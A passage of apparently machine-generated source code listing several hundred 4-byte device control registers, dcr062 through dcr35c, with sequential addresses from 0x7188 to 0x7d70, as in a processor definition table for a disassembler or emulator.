Register('dcr062', 4, 0x7188),
Register('dcr063', 4, 0x718c),
Register('dcr064', 4, 0x7190),
Register('dcr065', 4, 0x7194),
Register('dcr066', 4, 0x7198),
Register('dcr067', 4, 0x719c),
Register('dcr068', 4, 0x71a0),
Register('dcr069', 4, 0x71a4),
Register('dcr06a', 4, 0x71a8),
Register('dcr06b', 4, 0x71ac),
Register('dcr06c', 4, 0x71b0),
Register('dcr06d', 4, 0x71b4),
Register('dcr06e', 4, 0x71b8),
Register('dcr06f', 4, 0x71bc),
Register('dcr070', 4, 0x71c0),
Register('dcr071', 4, 0x71c4),
Register('dcr072', 4, 0x71c8),
Register('dcr073', 4, 0x71cc),
Register('dcr074', 4, 0x71d0),
Register('dcr075', 4, 0x71d4),
Register('dcr076', 4, 0x71d8),
Register('dcr077', 4, 0x71dc),
Register('dcr078', 4, 0x71e0),
Register('dcr079', 4, 0x71e4),
Register('dcr07a', 4, 0x71e8),
Register('dcr07b', 4, 0x71ec),
Register('dcr07c', 4, 0x71f0),
Register('dcr07d', 4, 0x71f4),
Register('dcr07e', 4, 0x71f8),
Register('dcr07f', 4, 0x71fc),
Register('dcr080', 4, 0x7200),
Register('dcr081', 4, 0x7204),
Register('dcr082', 4, 0x7208),
Register('dcr083', 4, 0x720c),
Register('dcr084', 4, 0x7210),
Register('dcr085', 4, 0x7214),
Register('dcr086', 4, 0x7218),
Register('dcr087', 4, 0x721c),
Register('dcr088', 4, 0x7220),
Register('dcr089', 4, 0x7224),
Register('dcr08a', 4, 0x7228),
Register('dcr08b', 4, 0x722c),
Register('dcr08c', 4, 0x7230),
Register('dcr08d', 4, 0x7234),
Register('dcr08e', 4, 0x7238),
Register('dcr08f', 4, 0x723c),
Register('dcr090', 4, 0x7240),
Register('dcr091', 4, 0x7244),
Register('dcr092', 4, 0x7248),
Register('dcr093', 4, 0x724c),
Register('dcr094', 4, 0x7250),
Register('dcr095', 4, 0x7254),
Register('dcr096', 4, 0x7258),
Register('dcr097', 4, 0x725c),
Register('dcr098', 4, 0x7260),
Register('dcr099', 4, 0x7264),
Register('dcr09a', 4, 0x7268),
Register('dcr09b', 4, 0x726c),
Register('dcr09c', 4, 0x7270),
Register('dcr09d', 4, 0x7274),
Register('dcr09e', 4, 0x7278),
Register('dcr09f', 4, 0x727c),
Register('dcr0a0', 4, 0x7280),
Register('dcr0a1', 4, 0x7284),
Register('dcr0a2', 4, 0x7288),
Register('dcr0a3', 4, 0x728c),
Register('dcr0a4', 4, 0x7290),
Register('dcr0a5', 4, 0x7294),
Register('dcr0a6', 4, 0x7298),
Register('dcr0a7', 4, 0x729c),
Register('dcr0a8', 4, 0x72a0),
Register('dcr0a9', 4, 0x72a4),
Register('dcr0aa', 4, 0x72a8),
Register('dcr0ab', 4, 0x72ac),
Register('dcr0ac', 4, 0x72b0),
Register('dcr0ad', 4, 0x72b4),
Register('dcr0ae', 4, 0x72b8),
Register('dcr0af', 4, 0x72bc),
Register('dcr0b0', 4, 0x72c0),
Register('dcr0b1', 4, 0x72c4),
Register('dcr0b2', 4, 0x72c8),
Register('dcr0b3', 4, 0x72cc),
Register('dcr0b4', 4, 0x72d0),
Register('dcr0b5', 4, 0x72d4),
Register('dcr0b6', 4, 0x72d8),
Register('dcr0b7', 4, 0x72dc),
Register('dcr0b8', 4, 0x72e0),
Register('dcr0b9', 4, 0x72e4),
Register('dcr0ba', 4, 0x72e8),
Register('dcr0bb', 4, 0x72ec),
Register('dcr0bc', 4, 0x72f0),
Register('dcr0bd', 4, 0x72f4),
Register('dcr0be', 4, 0x72f8),
Register('dcr0bf', 4, 0x72fc),
Register('dcr0c0', 4, 0x7300),
Register('dcr0c1', 4, 0x7304),
Register('dcr0c2', 4, 0x7308),
Register('dcr0c3', 4, 0x730c),
Register('dcr0c4', 4, 0x7310),
Register('dcr0c5', 4, 0x7314),
Register('dcr0c6', 4, 0x7318),
Register('dcr0c7', 4, 0x731c),
Register('dcr0c8', 4, 0x7320),
Register('dcr0c9', 4, 0x7324),
Register('dcr0ca', 4, 0x7328),
Register('dcr0cb', 4, 0x732c),
Register('dcr0cc', 4, 0x7330),
Register('dcr0cd', 4, 0x7334),
Register('dcr0ce', 4, 0x7338),
Register('dcr0cf', 4, 0x733c),
Register('dcr0d0', 4, 0x7340),
Register('dcr0d1', 4, 0x7344),
Register('dcr0d2', 4, 0x7348),
Register('dcr0d3', 4, 0x734c),
Register('dcr0d4', 4, 0x7350),
Register('dcr0d5', 4, 0x7354),
Register('dcr0d6', 4, 0x7358),
Register('dcr0d7', 4, 0x735c),
Register('dcr0d8', 4, 0x7360),
Register('dcr0d9', 4, 0x7364),
Register('dcr0da', 4, 0x7368),
Register('dcr0db', 4, 0x736c),
Register('dcr0dc', 4, 0x7370),
Register('dcr0dd', 4, 0x7374),
Register('dcr0de', 4, 0x7378),
Register('dcr0df', 4, 0x737c),
Register('dcr0e0', 4, 0x7380),
Register('dcr0e1', 4, 0x7384),
Register('dcr0e2', 4, 0x7388),
Register('dcr0e3', 4, 0x738c),
Register('dcr0e4', 4, 0x7390),
Register('dcr0e5', 4, 0x7394),
Register('dcr0e6', 4, 0x7398),
Register('dcr0e7', 4, 0x739c),
Register('dcr0e8', 4, 0x73a0),
Register('dcr0e9', 4, 0x73a4),
Register('dcr0ea', 4, 0x73a8),
Register('dcr0eb', 4, 0x73ac),
Register('dcr0ec', 4, 0x73b0),
Register('dcr0ed', 4, 0x73b4),
Register('dcr0ee', 4, 0x73b8),
Register('dcr0ef', 4, 0x73bc),
Register('dcr0f0', 4, 0x73c0),
Register('dcr0f1', 4, 0x73c4),
Register('dcr0f2', 4, 0x73c8),
Register('dcr0f3', 4, 0x73cc),
Register('dcr0f4', 4, 0x73d0),
Register('dcr0f5', 4, 0x73d4),
Register('dcr0f6', 4, 0x73d8),
Register('dcr0f7', 4, 0x73dc),
Register('dcr0f8', 4, 0x73e0),
Register('dcr0f9', 4, 0x73e4),
Register('dcr0fa', 4, 0x73e8),
Register('dcr0fb', 4, 0x73ec),
Register('dcr0fc', 4, 0x73f0),
Register('dcr0fd', 4, 0x73f4),
Register('dcr0fe', 4, 0x73f8),
Register('dcr0ff', 4, 0x73fc),
Register('dcr100', 4, 0x7400),
Register('dcr101', 4, 0x7404),
Register('dcr102', 4, 0x7408),
Register('dcr103', 4, 0x740c),
Register('dcr104', 4, 0x7410),
Register('dcr105', 4, 0x7414),
Register('dcr106', 4, 0x7418),
Register('dcr107', 4, 0x741c),
Register('dcr108', 4, 0x7420),
Register('dcr109', 4, 0x7424),
Register('dcr10a', 4, 0x7428),
Register('dcr10b', 4, 0x742c),
Register('dcr10c', 4, 0x7430),
Register('dcr10d', 4, 0x7434),
Register('dcr10e', 4, 0x7438),
Register('dcr10f', 4, 0x743c),
Register('dcr110', 4, 0x7440),
Register('dcr111', 4, 0x7444),
Register('dcr112', 4, 0x7448),
Register('dcr113', 4, 0x744c),
Register('dcr114', 4, 0x7450),
Register('dcr115', 4, 0x7454),
Register('dcr116', 4, 0x7458),
Register('dcr117', 4, 0x745c),
Register('dcr118', 4, 0x7460),
Register('dcr119', 4, 0x7464),
Register('dcr11a', 4, 0x7468),
Register('dcr11b', 4, 0x746c),
Register('dcr11c', 4, 0x7470),
Register('dcr11d', 4, 0x7474),
Register('dcr11e', 4, 0x7478),
Register('dcr11f', 4, 0x747c),
Register('dcr120', 4, 0x7480),
Register('dcr121', 4, 0x7484),
Register('dcr122', 4, 0x7488),
Register('dcr123', 4, 0x748c),
Register('dcr124', 4, 0x7490),
Register('dcr125', 4, 0x7494),
Register('dcr126', 4, 0x7498),
Register('dcr127', 4, 0x749c),
Register('dcr128', 4, 0x74a0),
Register('dcr129', 4, 0x74a4),
Register('dcr12a', 4, 0x74a8),
Register('dcr12b', 4, 0x74ac),
Register('dcr12c', 4, 0x74b0),
Register('dcr12d', 4, 0x74b4),
Register('dcr12e', 4, 0x74b8),
Register('dcr12f', 4, 0x74bc),
Register('dcr130', 4, 0x74c0),
Register('dcr131', 4, 0x74c4),
Register('dcr132', 4, 0x74c8),
Register('dcr133', 4, 0x74cc),
Register('dcr134', 4, 0x74d0),
Register('dcr135', 4, 0x74d4),
Register('dcr136', 4, 0x74d8),
Register('dcr137', 4, 0x74dc),
Register('dcr138', 4, 0x74e0),
Register('dcr139', 4, 0x74e4),
Register('dcr13a', 4, 0x74e8),
Register('dcr13b', 4, 0x74ec),
Register('dcr13c', 4, 0x74f0),
Register('dcr13d', 4, 0x74f4),
Register('dcr13e', 4, 0x74f8),
Register('dcr13f', 4, 0x74fc),
Register('dcr140', 4, 0x7500),
Register('dcr141', 4, 0x7504),
Register('dcr142', 4, 0x7508),
Register('dcr143', 4, 0x750c),
Register('dcr144', 4, 0x7510),
Register('dcr145', 4, 0x7514),
Register('dcr146', 4, 0x7518),
Register('dcr147', 4, 0x751c),
Register('dcr148', 4, 0x7520),
Register('dcr149', 4, 0x7524),
Register('dcr14a', 4, 0x7528),
Register('dcr14b', 4, 0x752c),
Register('dcr14c', 4, 0x7530),
Register('dcr14d', 4, 0x7534),
Register('dcr14e', 4, 0x7538),
Register('dcr14f', 4, 0x753c),
Register('dcr150', 4, 0x7540),
Register('dcr151', 4, 0x7544),
Register('dcr152', 4, 0x7548),
Register('dcr153', 4, 0x754c),
Register('dcr154', 4, 0x7550),
Register('dcr155', 4, 0x7554),
Register('dcr156', 4, 0x7558),
Register('dcr157', 4, 0x755c),
Register('dcr158', 4, 0x7560),
Register('dcr159', 4, 0x7564),
Register('dcr15a', 4, 0x7568),
Register('dcr15b', 4, 0x756c),
Register('dcr15c', 4, 0x7570),
Register('dcr15d', 4, 0x7574),
Register('dcr15e', 4, 0x7578),
Register('dcr15f', 4, 0x757c),
Register('dcr160', 4, 0x7580),
Register('dcr161', 4, 0x7584),
Register('dcr162', 4, 0x7588),
Register('dcr163', 4, 0x758c),
Register('dcr164', 4, 0x7590),
Register('dcr165', 4, 0x7594),
Register('dcr166', 4, 0x7598),
Register('dcr167', 4, 0x759c),
Register('dcr168', 4, 0x75a0),
Register('dcr169', 4, 0x75a4),
Register('dcr16a', 4, 0x75a8),
Register('dcr16b', 4, 0x75ac),
Register('dcr16c', 4, 0x75b0),
Register('dcr16d', 4, 0x75b4),
Register('dcr16e', 4, 0x75b8),
Register('dcr16f', 4, 0x75bc),
Register('dcr170', 4, 0x75c0),
Register('dcr171', 4, 0x75c4),
Register('dcr172', 4, 0x75c8),
Register('dcr173', 4, 0x75cc),
Register('dcr174', 4, 0x75d0),
Register('dcr175', 4, 0x75d4),
Register('dcr176', 4, 0x75d8),
Register('dcr177', 4, 0x75dc),
Register('dcr178', 4, 0x75e0),
Register('dcr179', 4, 0x75e4),
Register('dcr17a', 4, 0x75e8),
Register('dcr17b', 4, 0x75ec),
Register('dcr17c', 4, 0x75f0),
Register('dcr17d', 4, 0x75f4),
Register('dcr17e', 4, 0x75f8),
Register('dcr17f', 4, 0x75fc),
Register('dcr180', 4, 0x7600),
Register('dcr181', 4, 0x7604),
Register('dcr182', 4, 0x7608),
Register('dcr183', 4, 0x760c),
Register('dcr184', 4, 0x7610),
Register('dcr185', 4, 0x7614),
Register('dcr186', 4, 0x7618),
Register('dcr187', 4, 0x761c),
Register('dcr188', 4, 0x7620),
Register('dcr189', 4, 0x7624),
Register('dcr18a', 4, 0x7628),
Register('dcr18b', 4, 0x762c),
Register('dcr18c', 4, 0x7630),
Register('dcr18d', 4, 0x7634),
Register('dcr18e', 4, 0x7638),
Register('dcr18f', 4, 0x763c),
Register('dcr190', 4, 0x7640),
Register('dcr191', 4, 0x7644),
Register('dcr192', 4, 0x7648),
Register('dcr193', 4, 0x764c),
Register('dcr194', 4, 0x7650),
Register('dcr195', 4, 0x7654),
Register('dcr196', 4, 0x7658),
Register('dcr197', 4, 0x765c),
Register('dcr198', 4, 0x7660),
Register('dcr199', 4, 0x7664),
Register('dcr19a', 4, 0x7668),
Register('dcr19b', 4, 0x766c),
Register('dcr19c', 4, 0x7670),
Register('dcr19d', 4, 0x7674),
Register('dcr19e', 4, 0x7678),
Register('dcr19f', 4, 0x767c),
Register('dcr1a0', 4, 0x7680),
Register('dcr1a1', 4, 0x7684),
Register('dcr1a2', 4, 0x7688),
Register('dcr1a3', 4, 0x768c),
Register('dcr1a4', 4, 0x7690),
Register('dcr1a5', 4, 0x7694),
Register('dcr1a6', 4, 0x7698),
Register('dcr1a7', 4, 0x769c),
Register('dcr1a8', 4, 0x76a0),
Register('dcr1a9', 4, 0x76a4),
Register('dcr1aa', 4, 0x76a8),
Register('dcr1ab', 4, 0x76ac),
Register('dcr1ac', 4, 0x76b0),
Register('dcr1ad', 4, 0x76b4),
Register('dcr1ae', 4, 0x76b8),
Register('dcr1af', 4, 0x76bc),
Register('dcr1b0', 4, 0x76c0),
Register('dcr1b1', 4, 0x76c4),
Register('dcr1b2', 4, 0x76c8),
Register('dcr1b3', 4, 0x76cc),
Register('dcr1b4', 4, 0x76d0),
Register('dcr1b5', 4, 0x76d4),
Register('dcr1b6', 4, 0x76d8),
Register('dcr1b7', 4, 0x76dc),
Register('dcr1b8', 4, 0x76e0),
Register('dcr1b9', 4, 0x76e4),
Register('dcr1ba', 4, 0x76e8),
Register('dcr1bb', 4, 0x76ec),
Register('dcr1bc', 4, 0x76f0),
Register('dcr1bd', 4, 0x76f4),
Register('dcr1be', 4, 0x76f8),
Register('dcr1bf', 4, 0x76fc),
Register('dcr1c0', 4, 0x7700),
Register('dcr1c1', 4, 0x7704),
Register('dcr1c2', 4, 0x7708),
Register('dcr1c3', 4, 0x770c),
Register('dcr1c4', 4, 0x7710),
Register('dcr1c5', 4, 0x7714),
Register('dcr1c6', 4, 0x7718),
Register('dcr1c7', 4, 0x771c),
Register('dcr1c8', 4, 0x7720),
Register('dcr1c9', 4, 0x7724),
Register('dcr1ca', 4, 0x7728),
Register('dcr1cb', 4, 0x772c),
Register('dcr1cc', 4, 0x7730),
Register('dcr1cd', 4, 0x7734),
Register('dcr1ce', 4, 0x7738),
Register('dcr1cf', 4, 0x773c),
Register('dcr1d0', 4, 0x7740),
Register('dcr1d1', 4, 0x7744),
Register('dcr1d2', 4, 0x7748),
Register('dcr1d3', 4, 0x774c),
Register('dcr1d4', 4, 0x7750),
Register('dcr1d5', 4, 0x7754),
Register('dcr1d6', 4, 0x7758),
Register('dcr1d7', 4, 0x775c),
Register('dcr1d8', 4, 0x7760),
Register('dcr1d9', 4, 0x7764),
Register('dcr1da', 4, 0x7768),
Register('dcr1db', 4, 0x776c),
Register('dcr1dc', 4, 0x7770),
Register('dcr1dd', 4, 0x7774),
Register('dcr1de', 4, 0x7778),
Register('dcr1df', 4, 0x777c),
Register('dcr1e0', 4, 0x7780),
Register('dcr1e1', 4, 0x7784),
Register('dcr1e2', 4, 0x7788),
Register('dcr1e3', 4, 0x778c),
Register('dcr1e4', 4, 0x7790),
Register('dcr1e5', 4, 0x7794),
Register('dcr1e6', 4, 0x7798),
Register('dcr1e7', 4, 0x779c),
Register('dcr1e8', 4, 0x77a0),
Register('dcr1e9', 4, 0x77a4),
Register('dcr1ea', 4, 0x77a8),
Register('dcr1eb', 4, 0x77ac),
Register('dcr1ec', 4, 0x77b0),
Register('dcr1ed', 4, 0x77b4),
Register('dcr1ee', 4, 0x77b8),
Register('dcr1ef', 4, 0x77bc),
Register('dcr1f0', 4, 0x77c0),
Register('dcr1f1', 4, 0x77c4),
Register('dcr1f2', 4, 0x77c8),
Register('dcr1f3', 4, 0x77cc),
Register('dcr1f4', 4, 0x77d0),
Register('dcr1f5', 4, 0x77d4),
Register('dcr1f6', 4, 0x77d8),
Register('dcr1f7', 4, 0x77dc),
Register('dcr1f8', 4, 0x77e0),
Register('dcr1f9', 4, 0x77e4),
Register('dcr1fa', 4, 0x77e8),
Register('dcr1fb', 4, 0x77ec),
Register('dcr1fc', 4, 0x77f0),
Register('dcr1fd', 4, 0x77f4),
Register('dcr1fe', 4, 0x77f8),
Register('dcr1ff', 4, 0x77fc),
Register('dcr200', 4, 0x7800),
Register('dcr201', 4, 0x7804),
Register('dcr202', 4, 0x7808),
Register('dcr203', 4, 0x780c),
Register('dcr204', 4, 0x7810),
Register('dcr205', 4, 0x7814),
Register('dcr206', 4, 0x7818),
Register('dcr207', 4, 0x781c),
Register('dcr208', 4, 0x7820),
Register('dcr209', 4, 0x7824),
Register('dcr20a', 4, 0x7828),
Register('dcr20b', 4, 0x782c),
Register('dcr20c', 4, 0x7830),
Register('dcr20d', 4, 0x7834),
Register('dcr20e', 4, 0x7838),
Register('dcr20f', 4, 0x783c),
Register('dcr210', 4, 0x7840),
Register('dcr211', 4, 0x7844),
Register('dcr212', 4, 0x7848),
Register('dcr213', 4, 0x784c),
Register('dcr214', 4, 0x7850),
Register('dcr215', 4, 0x7854),
Register('dcr216', 4, 0x7858),
Register('dcr217', 4, 0x785c),
Register('dcr218', 4, 0x7860),
Register('dcr219', 4, 0x7864),
Register('dcr21a', 4, 0x7868),
Register('dcr21b', 4, 0x786c),
Register('dcr21c', 4, 0x7870),
Register('dcr21d', 4, 0x7874),
Register('dcr21e', 4, 0x7878),
Register('dcr21f', 4, 0x787c),
Register('dcr220', 4, 0x7880),
Register('dcr221', 4, 0x7884),
Register('dcr222', 4, 0x7888),
Register('dcr223', 4, 0x788c),
Register('dcr224', 4, 0x7890),
Register('dcr225', 4, 0x7894),
Register('dcr226', 4, 0x7898),
Register('dcr227', 4, 0x789c),
Register('dcr228', 4, 0x78a0),
Register('dcr229', 4, 0x78a4),
Register('dcr22a', 4, 0x78a8),
Register('dcr22b', 4, 0x78ac),
Register('dcr22c', 4, 0x78b0),
Register('dcr22d', 4, 0x78b4),
Register('dcr22e', 4, 0x78b8),
Register('dcr22f', 4, 0x78bc),
Register('dcr230', 4, 0x78c0),
Register('dcr231', 4, 0x78c4),
Register('dcr232', 4, 0x78c8),
Register('dcr233', 4, 0x78cc),
Register('dcr234', 4, 0x78d0),
Register('dcr235', 4, 0x78d4),
Register('dcr236', 4, 0x78d8),
Register('dcr237', 4, 0x78dc),
Register('dcr238', 4, 0x78e0),
Register('dcr239', 4, 0x78e4),
Register('dcr23a', 4, 0x78e8),
Register('dcr23b', 4, 0x78ec),
Register('dcr23c', 4, 0x78f0),
Register('dcr23d', 4, 0x78f4),
Register('dcr23e', 4, 0x78f8),
Register('dcr23f', 4, 0x78fc),
Register('dcr240', 4, 0x7900),
Register('dcr241', 4, 0x7904),
Register('dcr242', 4, 0x7908),
Register('dcr243', 4, 0x790c),
Register('dcr244', 4, 0x7910),
Register('dcr245', 4, 0x7914),
Register('dcr246', 4, 0x7918),
Register('dcr247', 4, 0x791c),
Register('dcr248', 4, 0x7920),
Register('dcr249', 4, 0x7924),
Register('dcr24a', 4, 0x7928),
Register('dcr24b', 4, 0x792c),
Register('dcr24c', 4, 0x7930),
Register('dcr24d', 4, 0x7934),
Register('dcr24e', 4, 0x7938),
Register('dcr24f', 4, 0x793c),
Register('dcr250', 4, 0x7940),
Register('dcr251', 4, 0x7944),
Register('dcr252', 4, 0x7948),
Register('dcr253', 4, 0x794c),
Register('dcr254', 4, 0x7950),
Register('dcr255', 4, 0x7954),
Register('dcr256', 4, 0x7958),
Register('dcr257', 4, 0x795c),
Register('dcr258', 4, 0x7960),
Register('dcr259', 4, 0x7964),
Register('dcr25a', 4, 0x7968),
Register('dcr25b', 4, 0x796c),
Register('dcr25c', 4, 0x7970),
Register('dcr25d', 4, 0x7974),
Register('dcr25e', 4, 0x7978),
Register('dcr25f', 4, 0x797c),
Register('dcr260', 4, 0x7980),
Register('dcr261', 4, 0x7984),
Register('dcr262', 4, 0x7988),
Register('dcr263', 4, 0x798c),
Register('dcr264', 4, 0x7990),
Register('dcr265', 4, 0x7994),
Register('dcr266', 4, 0x7998),
Register('dcr267', 4, 0x799c),
Register('dcr268', 4, 0x79a0),
Register('dcr269', 4, 0x79a4),
Register('dcr26a', 4, 0x79a8),
Register('dcr26b', 4, 0x79ac),
Register('dcr26c', 4, 0x79b0),
Register('dcr26d', 4, 0x79b4),
Register('dcr26e', 4, 0x79b8),
Register('dcr26f', 4, 0x79bc),
Register('dcr270', 4, 0x79c0),
Register('dcr271', 4, 0x79c4),
Register('dcr272', 4, 0x79c8),
Register('dcr273', 4, 0x79cc),
Register('dcr274', 4, 0x79d0),
Register('dcr275', 4, 0x79d4),
Register('dcr276', 4, 0x79d8),
Register('dcr277', 4, 0x79dc),
Register('dcr278', 4, 0x79e0),
Register('dcr279', 4, 0x79e4),
Register('dcr27a', 4, 0x79e8),
Register('dcr27b', 4, 0x79ec),
Register('dcr27c', 4, 0x79f0),
Register('dcr27d', 4, 0x79f4),
Register('dcr27e', 4, 0x79f8),
Register('dcr27f', 4, 0x79fc),
Register('dcr280', 4, 0x7a00),
Register('dcr281', 4, 0x7a04),
Register('dcr282', 4, 0x7a08),
Register('dcr283', 4, 0x7a0c),
Register('dcr284', 4, 0x7a10),
Register('dcr285', 4, 0x7a14),
Register('dcr286', 4, 0x7a18),
Register('dcr287', 4, 0x7a1c),
Register('dcr288', 4, 0x7a20),
Register('dcr289', 4, 0x7a24),
Register('dcr28a', 4, 0x7a28),
Register('dcr28b', 4, 0x7a2c),
Register('dcr28c', 4, 0x7a30),
Register('dcr28d', 4, 0x7a34),
Register('dcr28e', 4, 0x7a38),
Register('dcr28f', 4, 0x7a3c),
Register('dcr290', 4, 0x7a40),
Register('dcr291', 4, 0x7a44),
Register('dcr292', 4, 0x7a48),
Register('dcr293', 4, 0x7a4c),
Register('dcr294', 4, 0x7a50),
Register('dcr295', 4, 0x7a54),
Register('dcr296', 4, 0x7a58),
Register('dcr297', 4, 0x7a5c),
Register('dcr298', 4, 0x7a60),
Register('dcr299', 4, 0x7a64),
Register('dcr29a', 4, 0x7a68),
Register('dcr29b', 4, 0x7a6c),
Register('dcr29c', 4, 0x7a70),
Register('dcr29d', 4, 0x7a74),
Register('dcr29e', 4, 0x7a78),
Register('dcr29f', 4, 0x7a7c),
Register('dcr2a0', 4, 0x7a80),
Register('dcr2a1', 4, 0x7a84),
Register('dcr2a2', 4, 0x7a88),
Register('dcr2a3', 4, 0x7a8c),
Register('dcr2a4', 4, 0x7a90),
Register('dcr2a5', 4, 0x7a94),
Register('dcr2a6', 4, 0x7a98),
Register('dcr2a7', 4, 0x7a9c),
Register('dcr2a8', 4, 0x7aa0),
Register('dcr2a9', 4, 0x7aa4),
Register('dcr2aa', 4, 0x7aa8),
Register('dcr2ab', 4, 0x7aac),
Register('dcr2ac', 4, 0x7ab0),
Register('dcr2ad', 4, 0x7ab4),
Register('dcr2ae', 4, 0x7ab8),
Register('dcr2af', 4, 0x7abc),
Register('dcr2b0', 4, 0x7ac0),
Register('dcr2b1', 4, 0x7ac4),
Register('dcr2b2', 4, 0x7ac8),
Register('dcr2b3', 4, 0x7acc),
Register('dcr2b4', 4, 0x7ad0),
Register('dcr2b5', 4, 0x7ad4),
Register('dcr2b6', 4, 0x7ad8),
Register('dcr2b7', 4, 0x7adc),
Register('dcr2b8', 4, 0x7ae0),
Register('dcr2b9', 4, 0x7ae4),
Register('dcr2ba', 4, 0x7ae8),
Register('dcr2bb', 4, 0x7aec),
Register('dcr2bc', 4, 0x7af0),
Register('dcr2bd', 4, 0x7af4),
Register('dcr2be', 4, 0x7af8),
Register('dcr2bf', 4, 0x7afc),
Register('dcr2c0', 4, 0x7b00),
Register('dcr2c1', 4, 0x7b04),
Register('dcr2c2', 4, 0x7b08),
Register('dcr2c3', 4, 0x7b0c),
Register('dcr2c4', 4, 0x7b10),
Register('dcr2c5', 4, 0x7b14),
Register('dcr2c6', 4, 0x7b18),
Register('dcr2c7', 4, 0x7b1c),
Register('dcr2c8', 4, 0x7b20),
Register('dcr2c9', 4, 0x7b24),
Register('dcr2ca', 4, 0x7b28),
Register('dcr2cb', 4, 0x7b2c),
Register('dcr2cc', 4, 0x7b30),
Register('dcr2cd', 4, 0x7b34),
Register('dcr2ce', 4, 0x7b38),
Register('dcr2cf', 4, 0x7b3c),
Register('dcr2d0', 4, 0x7b40),
Register('dcr2d1', 4, 0x7b44),
Register('dcr2d2', 4, 0x7b48),
Register('dcr2d3', 4, 0x7b4c),
Register('dcr2d4', 4, 0x7b50),
Register('dcr2d5', 4, 0x7b54),
Register('dcr2d6', 4, 0x7b58),
Register('dcr2d7', 4, 0x7b5c),
Register('dcr2d8', 4, 0x7b60),
Register('dcr2d9', 4, 0x7b64),
Register('dcr2da', 4, 0x7b68),
Register('dcr2db', 4, 0x7b6c),
Register('dcr2dc', 4, 0x7b70),
Register('dcr2dd', 4, 0x7b74),
Register('dcr2de', 4, 0x7b78),
Register('dcr2df', 4, 0x7b7c),
Register('dcr2e0', 4, 0x7b80),
Register('dcr2e1', 4, 0x7b84),
Register('dcr2e2', 4, 0x7b88),
Register('dcr2e3', 4, 0x7b8c),
Register('dcr2e4', 4, 0x7b90),
Register('dcr2e5', 4, 0x7b94),
Register('dcr2e6', 4, 0x7b98),
Register('dcr2e7', 4, 0x7b9c),
Register('dcr2e8', 4, 0x7ba0),
Register('dcr2e9', 4, 0x7ba4),
Register('dcr2ea', 4, 0x7ba8),
Register('dcr2eb', 4, 0x7bac),
Register('dcr2ec', 4, 0x7bb0),
Register('dcr2ed', 4, 0x7bb4),
Register('dcr2ee', 4, 0x7bb8),
Register('dcr2ef', 4, 0x7bbc),
Register('dcr2f0', 4, 0x7bc0),
Register('dcr2f1', 4, 0x7bc4),
Register('dcr2f2', 4, 0x7bc8),
Register('dcr2f3', 4, 0x7bcc),
Register('dcr2f4', 4, 0x7bd0),
Register('dcr2f5', 4, 0x7bd4),
Register('dcr2f6', 4, 0x7bd8),
Register('dcr2f7', 4, 0x7bdc),
Register('dcr2f8', 4, 0x7be0),
Register('dcr2f9', 4, 0x7be4),
Register('dcr2fa', 4, 0x7be8),
Register('dcr2fb', 4, 0x7bec),
Register('dcr2fc', 4, 0x7bf0),
Register('dcr2fd', 4, 0x7bf4),
Register('dcr2fe', 4, 0x7bf8),
Register('dcr2ff', 4, 0x7bfc),
Register('dcr300', 4, 0x7c00),
Register('dcr301', 4, 0x7c04),
Register('dcr302', 4, 0x7c08),
Register('dcr303', 4, 0x7c0c),
Register('dcr304', 4, 0x7c10),
Register('dcr305', 4, 0x7c14),
Register('dcr306', 4, 0x7c18),
Register('dcr307', 4, 0x7c1c),
Register('dcr308', 4, 0x7c20),
Register('dcr309', 4, 0x7c24),
Register('dcr30a', 4, 0x7c28),
Register('dcr30b', 4, 0x7c2c),
Register('dcr30c', 4, 0x7c30),
Register('dcr30d', 4, 0x7c34),
Register('dcr30e', 4, 0x7c38),
Register('dcr30f', 4, 0x7c3c),
Register('dcr310', 4, 0x7c40),
Register('dcr311', 4, 0x7c44),
Register('dcr312', 4, 0x7c48),
Register('dcr313', 4, 0x7c4c),
Register('dcr314', 4, 0x7c50),
Register('dcr315', 4, 0x7c54),
Register('dcr316', 4, 0x7c58),
Register('dcr317', 4, 0x7c5c),
Register('dcr318', 4, 0x7c60),
Register('dcr319', 4, 0x7c64),
Register('dcr31a', 4, 0x7c68),
Register('dcr31b', 4, 0x7c6c),
Register('dcr31c', 4, 0x7c70),
Register('dcr31d', 4, 0x7c74),
Register('dcr31e', 4, 0x7c78),
Register('dcr31f', 4, 0x7c7c),
Register('dcr320', 4, 0x7c80),
Register('dcr321', 4, 0x7c84),
Register('dcr322', 4, 0x7c88),
Register('dcr323', 4, 0x7c8c),
Register('dcr324', 4, 0x7c90),
Register('dcr325', 4, 0x7c94),
Register('dcr326', 4, 0x7c98),
Register('dcr327', 4, 0x7c9c),
Register('dcr328', 4, 0x7ca0),
Register('dcr329', 4, 0x7ca4),
Register('dcr32a', 4, 0x7ca8),
Register('dcr32b', 4, 0x7cac),
Register('dcr32c', 4, 0x7cb0),
Register('dcr32d', 4, 0x7cb4),
Register('dcr32e', 4, 0x7cb8),
Register('dcr32f', 4, 0x7cbc),
Register('dcr330', 4, 0x7cc0),
Register('dcr331', 4, 0x7cc4),
Register('dcr332', 4, 0x7cc8),
Register('dcr333', 4, 0x7ccc),
Register('dcr334', 4, 0x7cd0),
Register('dcr335', 4, 0x7cd4),
Register('dcr336', 4, 0x7cd8),
Register('dcr337', 4, 0x7cdc),
Register('dcr338', 4, 0x7ce0),
Register('dcr339', 4, 0x7ce4),
Register('dcr33a', 4, 0x7ce8),
Register('dcr33b', 4, 0x7cec),
Register('dcr33c', 4, 0x7cf0),
Register('dcr33d', 4, 0x7cf4),
Register('dcr33e', 4, 0x7cf8),
Register('dcr33f', 4, 0x7cfc),
Register('dcr340', 4, 0x7d00),
Register('dcr341', 4, 0x7d04),
Register('dcr342', 4, 0x7d08),
Register('dcr343', 4, 0x7d0c),
Register('dcr344', 4, 0x7d10),
Register('dcr345', 4, 0x7d14),
Register('dcr346', 4, 0x7d18),
Register('dcr347', 4, 0x7d1c),
Register('dcr348', 4, 0x7d20),
Register('dcr349', 4, 0x7d24),
Register('dcr34a', 4, 0x7d28),
Register('dcr34b', 4, 0x7d2c),
Register('dcr34c', 4, 0x7d30),
Register('dcr34d', 4, 0x7d34),
Register('dcr34e', 4, 0x7d38),
Register('dcr34f', 4, 0x7d3c),
Register('dcr350', 4, 0x7d40),
Register('dcr351', 4, 0x7d44),
Register('dcr352', 4, 0x7d48),
Register('dcr353', 4, 0x7d4c),
Register('dcr354', 4, 0x7d50),
Register('dcr355', 4, 0x7d54),
Register('dcr356', 4, 0x7d58),
Register('dcr357', 4, 0x7d5c),
Register('dcr358', 4, 0x7d60),
Register('dcr359', 4, 0x7d64),
Register('dcr35a', 4, 0x7d68),
Register('dcr35b', 4, 0x7d6c),
Register('dcr35c', 4, 0x7d70),
